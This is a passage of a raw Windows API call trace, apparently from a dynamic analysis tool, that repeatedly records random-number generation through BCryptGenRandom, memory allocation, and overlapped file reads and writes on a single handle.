[0108.457] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.457] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.457] free (_Block=0x77d800) [0108.457] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.457] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.457] free (_Block=0x1fa4848) [0108.457] free (_Block=0x2071818) [0108.457] free (_Block=0x77d908) [0108.457] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.459] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.459] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.483] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6c8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.483] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.484] CloseHandle (hObject=0x13c0) returned 1 [0108.485] free (_Block=0x1ff1e60) [0108.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.492] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.493] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0108.493] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.493] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0108.493] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.493] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.493] free (_Block=0x77d800) [0108.493] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.493] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.494] free (_Block=0x1fa4848) [0108.494] free (_Block=0x2071818) [0108.494] free (_Block=0x77d908) [0108.494] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.494] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.495] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.496] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.496] CloseHandle (hObject=0x13c0) returned 1 [0108.496] free (_Block=0x1ff1e60) [0108.496] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.516] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0108.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0108.517] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.517] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.517] free (_Block=0x77d800) [0108.517] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.517] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.517] free (_Block=0x1fa4848) [0108.518] free (_Block=0x2071818) [0108.518] free (_Block=0x77d908) [0108.518] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.518] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.531] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1678, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.531] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.532] CloseHandle (hObject=0x13c0) returned 1 [0108.533] free (_Block=0x1ff1e60) [0108.533] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.539] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.540] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0108.540] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.540] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0108.540] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.540] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.540] free (_Block=0x77d800) [0108.540] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.540] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.541] free (_Block=0x1fa4848) [0108.541] free (_Block=0x2071818) [0108.541] free (_Block=0x77d908) [0108.541] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.541] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.555] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1498, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.555] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.568] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xbc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.568] CloseHandle (hObject=0x13c0) returned 1 [0108.569] free (_Block=0x1ff1e60) [0108.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0108.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0108.578] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.578] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.578] free (_Block=0x77d800) [0108.578] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.578] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.579] free (_Block=0x1fa4848) [0108.579] free (_Block=0x2071818) [0108.579] free (_Block=0x77d908) [0108.579] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.579] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.579] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.591] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1044, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.592] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.592] CloseHandle (hObject=0x13c0) returned 1 [0108.593] free (_Block=0x1ff1e60) [0108.593] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.668] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0108.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.089] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.089] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.089] free (_Block=0x77d800) [0109.089] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.089] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.102] free (_Block=0x1fa4848) [0109.102] free (_Block=0x2071818) [0109.102] free (_Block=0x77d908) [0109.103] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.103] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.124] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x332e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.125] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.136] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x69aa, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.137] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.137] CloseHandle (hObject=0x13c0) returned 1 [0109.151] free (_Block=0x1ff1e60) [0109.151] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.158] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.160] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.160] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.160] free (_Block=0x77d800) [0109.160] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.160] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.160] free (_Block=0x1fa4848) [0109.160] free (_Block=0x2071818) [0109.160] free (_Block=0x77d908) [0109.160] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.160] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.164] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.175] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2576, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.190] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6ba0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.191] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.192] CloseHandle (hObject=0x13c0) returned 1 [0109.193] free (_Block=0x1ff1e60) [0109.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.201] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.201] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.201] free (_Block=0x77d800) [0109.201] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.201] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.202] free (_Block=0x1fa4848) [0109.202] free (_Block=0x2071818) [0109.202] free (_Block=0x77d908) [0109.202] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.202] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.203] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.218] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1138, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.231] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1870, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.232] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.232] CloseHandle (hObject=0x13c0) returned 1 [0109.236] free (_Block=0x1ff1e60) [0109.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.245] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 